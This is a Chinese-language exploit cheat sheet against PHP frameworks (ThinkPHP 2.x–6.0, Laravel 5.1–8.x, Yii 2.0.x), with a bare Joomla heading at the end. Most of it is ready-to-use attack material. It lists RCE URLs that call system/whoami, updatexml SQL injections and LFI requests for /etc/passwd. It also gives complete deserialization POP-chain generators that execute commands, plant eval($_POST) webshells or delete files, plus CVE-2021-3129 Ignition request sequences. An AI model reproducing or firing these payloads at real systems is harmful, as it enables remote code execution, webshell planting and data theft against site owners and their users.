CMS

Exploit Database: https://www.exploit-db.com/

PHPGGC: https://github.com/ambionics/phpggc


对比源码:diff -r DirA DirB

ThinkPHP

  • 版本

    关键字:THINK_VERSION

  • 2.x

    • 2.x

      • RCE

        index.php?s=/index/index/name/${phpinfo()}

  • 3.2.x

    日志:<domain>/Application/Runtime/Logs/Home/21_04_27.log

    • 通用

      • SQL注入+文件读取+反序列化

        ThinkPHP v3.2.* (SQL注入&文件读取)反序列化POP链

      • RCE / LFI

        ThinkPHP3.2.x RCE漏洞通报

        如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。

        debug模式关

        index.php?m=--><?=phpinfo();?>

        LFI:

        index.php?m=Home&c=Index&a=index&value[filename]=./Application/Runtime/Logs/Home/21_06_30.log

        index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/21_06_30.log

        debug模式开

        index.php?m=Home&c=Index&a=index&test=--><?=phpinfo();?>

        LFI:

        index.php?m=Home&c=Index&a=index&value[filename]=./Application/Runtime/Logs/Home/21_06_30.log

        index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/21_06_30.log

        限定条件下参数的收集(替换变量名)

        param/name/value/array/arr/info/list/page/menus/var/data/moudle/module

    • 3.2.3

      • SQL注入

        index.php?m=Home&c=Index&a=index2&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1) %23

        index.php?username[0]=exp&username[1]==1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1) %23

        index.php?id[0]=bind&id[1]=0 and updatexml(1,concat(0x7e,user(),0x7e),1)&password=1

        index.php?m=Home&c=Index&a=sqlvul2&order[updatexml(1,concat(0x3a,user()),1)]

      • 变量覆盖

        empty($_content)?include $templateFile:eval('?>'.$_content);

      • 反序列化+SQL注入

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        37
        38
        39
        40
        41
        42
        43
        44
        45
        46
        47
        48
        49
        50
        51
        52
        53
        54
        55
        56
        57
        58
        <?php
        namespace Think\Image\Driver;
        use Think\Session\Driver\Memcache;
        class Imagick{
        private $img;
        public function __construct(){
        $this->img = new Memcache();
        }
        }

        namespace Think\Session\Driver;
        use Think\Model;
        class Memcache {
        protected $handle;
        public function __construct(){
        $this->sessionName=null;
        $this->handle= new Model();
        }
        }

        namespace Think;
        use Think\Db\Driver\Mysql;
        class Model{
        protected $pk;
        protected $options;
        protected $data;
        protected $db;
        public function __construct(){
        $this->options['where']='';
        $this->pk='x';
        $this->data[$this->pk]=array(
        "table"=>"mysql.user where 1=updatexml(1,concat(0x7e,user()),1)#",
        "where"=>"1=1"
        );
        $this->db=new Mysql();
        }
        }
        namespace Think\Db\Driver;
        use PDO;
        class Mysql{
        protected $options ;
        protected $config ;
        public function __construct(){
        $this->options= array(PDO::MYSQL_ATTR_LOCAL_INFILE => true ); // 开启才能读取文件
        $this->config= array(
        "debug" => 1,
        "database" => "mysql",
        "hostname" => "127.0.0.1",
        "hostport" => "3306",
        "charset" => "utf8",
        "username" => "root",
        "password" => "root"
        );
        }
        }

        use Think\Image\Driver\Imagick;
        echo base64_encode(serialize(new Imagick()));
  • 5.0.x

    • 5.0.7<=ver<=5.0.22

      • 未开启强制路由RCE

        ?s=index/think\config/get&name=database.username

        ?s=index/think\config/get&name=database.password

        ?s=index/\think\Lang/load&file=../../test.jpg

        ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

        ?s=index POST: _method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo

        ?s=index POST: _method=__construct&filter[]=system&method=GET&get[]=whoami

    • <5.0.23

      ThinkPHP 5.0.0~5.0.23 Request类任意方法调用导致RCE漏洞分析

      • RCE

        index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

        index.php?s=captcha POST: _method=__construct&filter[]=system&method=GET&get[]=whoami

        index.php?s=index/index POST: _method=__construct&filter[]=system&method=GET&get[]=whoami

      • 任意文件包含

        index.php?s=captcha POST: _method=__construct&method=GET&filter[]=think__include_file&server[]=1&get[]=/etc/passwd

    • <5.0.12

      • RCE

        index.php?s=index/index POST: _method=__construct&filter[]=system&method=POST&s=whoami

    • 5.0.21-5.0.23

      • RCE

        index.php?s=captcha POST: _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

    • 5.0.24

  • 5.1.x

    • 通用

      • 未开启强制路由RCE

        ?s=index/\think\Request/input&filter[]=system&data=pwd

        ?s=index/\think\request/input?data[]=-1&filter=phpinfo

        ?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>

        ?s=index/\think\view\driver\Think/display&template=<?php phpinfo();?>

        ?s=index/\think\view\driver\Think/__call&method=display&params[]=<?php system('whoami'); ?>

        ?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>

        ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

        ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

        ?s=/index/\think\request/cache&key=1|phpinfo

        ?s=/index/\think\request/cache&key=ls|system

      • 任意文件删除

        存在位置:\thinkphp\library\think\process\pipes\Windows.php

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        <?php
        namespace think\process\pipes;
        class Pipes {}
        class Windows extends Pipes {
        private $files = [];
        public function __construct() {
        $this->files = ['tmp.txt'];
        }
        }
        echo base64_encode(serialize(new Windows()));
  • 5.1.31

    • RCE

      index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

  • 5.1.38

    • 反序列化

      thinkPHP5.1整理

      index.php?sss=whoami POST: data=xxxxxx

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      <?php
      namespace think;
      abstract class Model{
      protected $append = [];
      private $data = [];
      function __construct(){
      $this->append = ["sss"=>["calc.exe","calc"]];
      $this->data = ["sss"=>new Request()];
      }
      }
      class Request
      {
      protected $hook = [];
      protected $filter = "system";
      protected $config = [
      // 表单ajax伪装变量
      'var_ajax' => '_ajax',
      ];
      function __construct(){
      $this->filter = "system";
      $this->config = ["var_ajax"=>'lin'];
      $this->hook = ["visible"=>[$this,"isAjax"]];
      }
      }


      namespace think\process\pipes;

      use think\model\concern\Conversion;
      use think\model\Pivot;
      class Windows
      {
      private $files = [];

      public function __construct()
      {
      $this->files=[new Pivot()];
      }
      }
      namespace think\model;

      use think\Model;

      class Pivot extends Model
      {
      }
      use think\process\pipes\Windows;
      echo urlencode(serialize(new Windows()));
      ?>
  • 6.0.x

    • 通用

      • 反序列化

        ThinkPHP V6.0.x 反序列化漏洞

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        37
        38
        39
        40
        41
        <?php
        namespace think\model\concern;

        trait Attribute{
        private $data;
        private $withAttr;
        }
        trait ModelEvent{
        protected $withEvent;
        }

        namespace think;

        abstract class Model{
        use model\concern\Attribute;
        use model\concern\ModelEvent;
        private $exists;
        private $force;
        private $lazySave;
        protected $suffix;
        function __construct($a = '')
        {
        $func = function(){phpinfo();};
        $b=\Opis\Closure\serialize($func);
        $this->exists = true;
        $this->force = true;
        $this->lazySave = true;
        $this->withEvent = false;
        $this->suffix = $a;
        $this->data=['x'=>''];

        $c=unserialize($b);
        $this->withAttr=['x'=>$c];
        }
        }

        namespace think\model;
        use think\Model;
        class Pivot extends Model{}
        require 'closure/autoload.php';
        echo urlencode(serialize(new Pivot(new Pivot())));

Laravel

  • 版本

    vendor/laravel/framework/src/Illuminate/Foundation/Application.php

  • 5.1

    • 5.1.x

      • 反序列化+RCE

        a.

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        37
        38
        39
        40
        41
        42
        43
        <?php
        namespace{
        use Mockery\Generator\DefinedTargetClass;
        class Swift_KeyCache_DiskKeyCache{
        private $_keys=['bit'=>array('bit'=>'bit')];
        private $_path;
        public function __construct($cmd){
        $this->_path=new DefinedTargetClass($cmd);
        }
        }
        echo urlencode(serialize(new Swift_KeyCache_DiskKeyCache($argv[1])));
        }
        namespace Mockery\Generator{
        use Faker\ValidGenerator;
        class DefinedTargetClass
        {
        private $rfc;
        public function __construct($cmd)
        {
        $this->rfc=new ValidGenerator($cmd);
        }
        }
        }
        namespace Faker{
        class DefaultGenerator{
        protected $default;
        public function __construct($cmd)
        {
        $this->default = $cmd;
        }
        }
        class ValidGenerator
        {
        protected $generator;
        protected $validator;
        protected $maxRetries;
        public function __construct($cmd){
        $this->generator=new DefaultGenerator($cmd);
        $this->maxRetries=9;
        $this->validator='system';
        }
        }
        }

        b.

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        <?php
        namespace{
        use phpDocumentor\Reflection\DocBlock\Tags\Deprecated;
        class Swift_KeyCache_DiskKeyCache{
        private $_keys=['bit'=>array('bit'=>'bit')];
        private $_path;
        public function __construct($cmd){
        $this->_path=new Deprecated($cmd);
        }
        }
        echo urlencode(serialize(new Swift_KeyCache_DiskKeyCache($argv[1])));
        }
        namespace phpDocumentor\Reflection\DocBlock\Tags{
        use Illuminate\Database\DatabaseManager;
        abstract class BaseTag{
        protected $description;
        }
        final class Deprecated extends BaseTag{
        public function __construct($cmd){
        $this->description=new DatabaseManager($cmd);
        }
        }
        }
        namespace Illuminate\Database{
        class DatabaseManager{
        protected $app;
        protected $extensions ;
        public function __construct($cmd)
        {
        $this->app['config']['database.default']=$cmd;
        $this->app['config']['database.connections']=array($cmd=>'system');
        $this->extensions[$cmd]='call_user_func';
        }
        }
        }

        c.

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        37
        38
        39
        40
        41
        42
        43
        44
        45
        46
        47
        48
        49
        50
        51
        52
        53
        54
        55
        56
        57
        58
        59
        60
        61
        62
        63
        64
        65
        66
        67
        68
        69
        <?php
        namespace{
        use Prophecy\Argument\Token\ObjectStateToken;
        class Swift_KeyCache_DiskKeyCache{
        private $_keys=['bit'=>array('bit'=>'bit')];
        private $_path;
        public function __construct($cmd){
        $this->_path=new ObjectStateToken($cmd);
        }
        }
        echo urlencode(serialize(new Swift_KeyCache_DiskKeyCache($argv[1])));
        }
        namespace Prophecy\Argument\Token{
        use Mockery\Generator\MockDefinition;
        use Illuminate\Validation\Validator;
        class ObjectStateToken{
        private $name;
        private $value;
        private $util;
        public function __construct($cmd){
        $this->name='bit';
        $this->value=new MockDefinition($cmd);
        $this->util=new Validator();
        }
        }
        }

        namespace Illuminate\Validation{
        use Faker\DefaultGenerator;
        class Validator{
        protected $container;
        protected $extensions = [];
        public function __construct(){
        $this->extensions['y']='xxx@load';
        $this->container=new DefaultGenerator();
        }
        }
        }
        namespace Faker{
        use Mockery\Loader\EvalLoader;
        class DefaultGenerator
        {
        protected $default;

        public function __construct()
        {
        $this->default = new EvalLoader();
        }
        }
        }
        namespace Mockery\Loader{
        class EvalLoader{}
        }
        namespace Mockery\Generator{
        use Illuminate\Session\Store;
        class MockDefinition{
        protected $config;
        protected $code;
        public function __construct($cmd){
        $this->config=new Store();
        $this->code=$cmd;
        }
        }
        }
        namespace Illuminate\Session{
        class Store{
        protected $name='bit';//类不存在就行
        }
        }
  • 5.4.x

    • 5.4.30

      • 反序列化(5.4-5.8)

        Laravel5.4 反序列化漏洞挖掘

        a.

        Illuminate/Support/Manager.php::__call -> driver() -> Illuminate/Notifications/ChannelManager.php

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        <?php
        namespace Illuminate\Broadcasting
        {
        use Illuminate\Notifications\ChannelManager;
        class PendingBroadcast
        {
        protected $events;

        public function __construct($cmd)
        {
        $this->events = new ChannelManager($cmd);
        }
        }
        echo base64_encode(serialize(new PendingBroadcast($argv[1])));
        }


        namespace Illuminate\Notifications
        {
        class ChannelManager
        {
        protected $app;
        protected $defaultChannel;
        protected $customCreators;

        public function __construct($cmd)
        {
        $this->app = $cmd;
        $this->customCreators = ['x' => 'system'];
        $this->defaultChannel = 'x';
        }
        }
        }

        b.

        Illuminate/Validation/Validator.php::__call

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        <?php
        namespace Illuminate\Broadcasting
        {
        use Illuminate\Validation\Validator;
        class PendingBroadcast
        {
        protected $events;
        protected $event;
        public function __construct($cmd)
        {
        $this->events = new Validator();
        $this->event=$cmd;
        }
        }
        echo base64_encode(serialize(new PendingBroadcast($argv[1])));
        }


        namespace Illuminate\Validation
        {
        class Validator
        {
        public $extensions = [''=>'system'];
        }
        }

        c.

        Illuminate/Events/Dispatcher.php

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        <?php
        namespace Illuminate\Broadcasting
        {
        use Illuminate\Events\Dispatcher;
        class PendingBroadcast
        {
        protected $events;
        protected $event;
        public function __construct($cmd)
        {
        $this->events = new Dispatcher($cmd);
        $this->event=$cmd;
        }
        }
        echo base64_encode(serialize(new PendingBroadcast($argv[1])));
        }


        namespace Illuminate\Events
        {
        class Dispatcher
        {
        protected $listeners;
        public function __construct($event){
        $this->listeners=[$event=>['system']];
        }
        }
        }

        d.

        Illuminate/Bus/Dispatcher.php

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        <?php
        namespace Illuminate\Bus{
        class Dispatcher{
        protected $queueResolver;

        public function __construct(){
        $this->queueResolver = "system";
        }
        }
        }
        namespace Illuminate\Broadcasting{
        use Illuminate\Bus\Dispatcher;
        class BroadcastEvent{
        public $connection;

        public function __construct($cmd){
        $this->connection = $cmd;
        }
        }
        class PendingBroadcast{
        protected $events;
        protected $event;

        public function __construct($event){
        $this->events = new Dispatcher();
        $this->event = new BroadcastEvent($event);
        }
        }
        echo base64_encode(serialize(new PendingBroadcast($argv[1])));
        }
        ?>

        e.

        Mockery/Loader/EvalLoader.php

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        37
        38
        39
        40
        41
        42
        43
        44
        45
        46
        47
        48
        49
        50
        51
        52
        <?php
        namespace Illuminate\Bus{
        use Mockery\Loader\EvalLoader;
        class Dispatcher{
        protected $queueResolver;

        public function __construct(){
        $this->queueResolver = [new EvalLoader(),'load'];
        }
        }
        }
        namespace Illuminate\Broadcasting{
        use Illuminate\Bus\Dispatcher;
        use Mockery\Generator\MockDefinition;
        class BroadcastEvent{
        public $connection;

        public function __construct($code){
        $this->connection = new MockDefinition($code);
        }
        }
        class PendingBroadcast{
        protected $events;
        protected $event;

        public function __construct($event){
        $this->events = new Dispatcher();
        $this->event = new BroadcastEvent($event);
        }
        }
        echo base64_encode(serialize(new PendingBroadcast($argv[1])));
        }
        namespace Mockery\Loader{
        class EvalLoader{}
        }
        namespace Mockery\Generator{
        use Illuminate\Session\Store;
        class MockDefinition{
        protected $config;
        protected $code;
        public function __construct($code){
        $this->config=new Store();
        $this->code=$code;
        }
        }
        }
        namespace Illuminate\Session{
        class Store{
        protected $name='x';//类不存在
        }
        }
        ?>
  • 5.7.x

    • 5.7.29

      • 反序列化+RCE

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        37
        38
        39
        40
        41
        42
        43
        44
        45
        46
        47
        48
        49
        50
        51
        52
        53
        54
        55
        56
        57
        58
        //不用PendingCommand.php
        <?php
        namespace Symfony\Component\Routing\Loader\Configurator {
        class ImportConfigurator
        {
        private $parent;
        public function __construct($parent)
        {
        $this->parent = $parent;
        }
        }
        }

        namespace Faker {
        class DefaultGenerator{
        protected $default;
        public function __construct($default)
        {
        $this->default = $default;
        }
        public function __call($method, $attributes)
        {
        return $this->default;
        }
        }
        class ValidGenerator
        {
        protected $generator;
        protected $validator;
        protected $maxRetries;
        public function __construct($validator,$generator)
        {
        $this->generator = new DefaultGenerator($generator);
        $this->validator = $validator;
        $this->maxRetries = 1;
        }

        public function __call($name, $arguments)
        {
        $i = 0;
        do {
        $res = call_user_func_array(array($this->generator, $name), $arguments);
        $i++;
        if ($i > $this->maxRetries) {
        throw new \OverflowException(sprintf('Maximum retries of %d reached without finding a valid value', $this->maxRetries));
        }
        } while (!call_user_func($this->validator, $res));

        return $res;
        }
        }
        }

        namespace {
        $a = new Faker\ValidGenerator("system","cat /flag");
        $b = new Symfony\Component\Routing\Loader\Configurator\ImportConfigurator($a);
        echo urlencode(serialize($b));
        }
  • 7.x

    • 7.30

      • 反序列化+RCE

        a.

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        <?php
        namespace Illuminate\Routing{
        use Illuminate\Validation\Validator;
        class PendingResourceRegistration
        {
        protected $registrar;
        protected $registered = false;
        protected $name='call_user_func';
        protected $controller='system';
        protected $options;
        public function __construct($cmd){
        $this->registrar=new Validator();
        $this->options=$cmd;
        }
        }
        echo urlencode(serialize(new PendingResourceRegistration($argv[1])));
        }
        namespace Illuminate\Validation{
        class Validator{
        public $extensions = [];
        public function __construct(){
        $this->extensions['']='call_user_func';
        }
        }
        }

        b.

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        <?php
        namespace Illuminate\Routing{
        use Illuminate\View\InvokableComponentVariable;
        class PendingResourceRegistration
        {
        protected $registrar;
        protected $registered = false;
        public function __construct(){
        $this->registrar=new InvokableComponentVariable();
        }
        }
        echo urlencode(serialize(new PendingResourceRegistration()));
        }
        namespace Illuminate\View{
        use PHPUnit\Framework\MockObject\MockClass;
        class InvokableComponentVariable{
        protected $callable;
        public function __construct(){
        $this->callable=array(new MockClass(),'generate');
        }
        }
        }
        namespace PHPUnit\Framework\MockObject{
        class MockClass{
        private $classCode;
        private $mockName;
        private $configurableMethods;
        public function __construct(){
        $this->classCode='eval($_POST["cmd"]);';
        $this->mockName='bit';
        $this->configurableMethods='bit';
        }
        }
        }
  • 8.x

    • 8.26.1

      • RCE

        CVE-2021-3129

        当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        POST /_ignition/execute-solution HTTP/1.1
        Host: 192.168.160.130:8077
        Content-Type: application/json
        Content-Length: 168
        {
        "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
        "parameters": {
        "variableName": "username",
        "viewFile": "xxxxxxx"
        }
        }

        页面出现了Ignition的报错,说明漏洞存在,且开启了debug模式。

        使用如下数据包清除日志文件:

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        POST /_ignition/execute-solution HTTP/1.1
        Host: 192.168.160.130:8077
        Content-Type: application/json
        Content-Length: 328
        {
        "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
        "parameters": {
        "variableName": "username",
        "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"
        }
        }

Yii

  • 版本

    a. 在controllers目录新建TestController.php控制器,打开TestController.php文件输入<?php echo Yii::getVersion(); ?>,访问Yii项目中的test控制器下的indexindex.php?r=test

    b. /vendor/yiisoft/yii2/BaseYii.php

  • 2.0.x

    • <2.0.37

      • 反序列化

        a. yii\db\BatchQueryResult::__destruct() -> Faker\Generator::__call() -> yii\rest\IndexAction::run()

        b. yii\db\BatchQueryResult::__destruct() -> Faker\Generator::__call() -> yii\rest\CreateAction::run()

        c.

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        <?php
        namespace yii\rest{
        class IndexAction{
        public $checkAccess;
        public $id;
        public function __construct(){
        $this->checkAccess = 'assert';
        $this->id = 'file_put_contents("1.php","<?php eval(\$_POST[0]);?>");exit();';
        }
        }
        }
        namespace yii\db{
        use yii\web\DbSession;
        class BatchQueryResult
        {
        private $_dataReader;
        public function __construct(){
        $this->_dataReader=new DbSession();
        }
        }
        }
        namespace yii\web{
        use yii\rest\IndexAction;
        class DbSession
        {
        public $writeCallback;
        public function __construct(){
        $a=new IndexAction();
        $this->writeCallback=[$a,'run'];
        }
        }
        }
        namespace{
        use yii\db\BatchQueryResult;
        echo base64_encode(serialize(new BatchQueryResult()));
        }
  • 2.0.38

    • 反序列化

      a. Codeception\Extension\RunProcess::__destruct() -> Faker\Generator::__call() -> yii\rest\IndexAction::run()

      b. Swift_KeyCache_DiskKeyCache -> phpDocumentor\Reflection\DocBlock\Tags\See::__toString()-> Faker\Generator::__call() -> yii\rest\IndexAction::run()

  • 2.0.42

    • 反序列化

      yii 2.0.42 最新反序列化利用全集

      a.

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      50
      51
      52
      53
      54
      55
      56
      57
      58
      59
      60
      61
      62
      63
      64
      65
      66
      67
      68
      69
      70
      71
      72
      73
      74
      75
      76
      77
      78
      79
      <?php
      namespace Codeception\Extension{
      use Prophecy\Prophecy\ObjectProphecy;
      class RunProcess{
      private $processes = [];
      public function __construct(){
      $a = new ObjectProphecy('1');
      $this->processes[]=new ObjectProphecy($a);
      }
      }
      echo urlencode(serialize(new RunProcess()));
      }
      namespace Prophecy\Prophecy{
      use Prophecy\Doubler\LazyDouble;
      class ObjectProphecy{
      private $lazyDouble;
      private $revealer;
      public function __construct($a){
      $this->revealer=$a;//一个调用自己的对象
      $this->lazyDouble=new lazyDouble();
      }
      }
      }
      namespace Prophecy\Doubler{
      use Prophecy\Doubler\Doubler;
      class LazyDouble{
      private $doubler;
      private $class;
      private $interfaces;
      private $arguments;
      private $double=null;
      public function __construct(){
      $this->doubler = new Doubler();
      $this->arguments=array('x'=>'x');
      $this->class=new \ReflectionClass('Exception');
      $this->interfaces[]=new \ReflectionClass('Exception');
      }
      }
      }
      namespace Faker{
      class DefaultGenerator{
      protected $default;
      public function __construct($default){
      $this->default = $default;
      }
      }
      }

      namespace Prophecy\Doubler\Generator\Node{
      class ClassNode{}
      }
      namespace Prophecy\Doubler{
      use Faker\DefaultGenerator;
      use Prophecy\Doubler\Generator\ClassCreator;
      use Prophecy\Doubler\Generator\Node\ClassNode;
      class Doubler{
      private $namer;
      private $mirror;
      private $patches;
      private $creator;
      public function __construct(){
      $name='x';
      $node=new ClassNode();
      $this->namer=new DefaultGenerator($name);
      $this->mirror=new DefaultGenerator($node);
      $this->patches=array(new DefaultGenerator(false));
      $this->creator=new ClassCreator();
      }
      }
      }
      namespace Prophecy\Doubler\Generator{
      use Faker\DefaultGenerator;
      class ClassCreator{
      private $generator;
      public function __construct(){
      $this->generator=new DefaultGenerator('eval($_POST["cmd"]);');
      }
      }
      }

      b.

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      <?php
      namespace Codeception\Extension{
      use Faker\UniqueGenerator;
      class RunProcess{
      private $processes = [];
      public function __construct(){
      $this->processes[]=new UniqueGenerator();
      }
      }
      echo urlencode(serialize(new RunProcess()));
      }
      namespace Faker{
      use Symfony\Component\String\LazyString;
      class UniqueGenerator{
      protected $generator;
      protected $maxRetries;
      public function __construct(){
      $a = new LazyString();
      $this->generator = new DefaultGenerator($a);
      $this->maxRetries = 2;
      }
      }
      class DefaultGenerator{
      protected $default;
      public function __construct($default = null){
      $this->default = $default;
      }
      }
      }
      namespace Symfony\Component\String{
      class LazyString{
      private $value;
      public function __construct(){
      include("closure/autoload.php");
      $a = function(){phpinfo();};
      $a = \Opis\Closure\serialize($a);
      $b = unserialize($a);
      $this->value=$b;
      }
      }
      }

Joomla!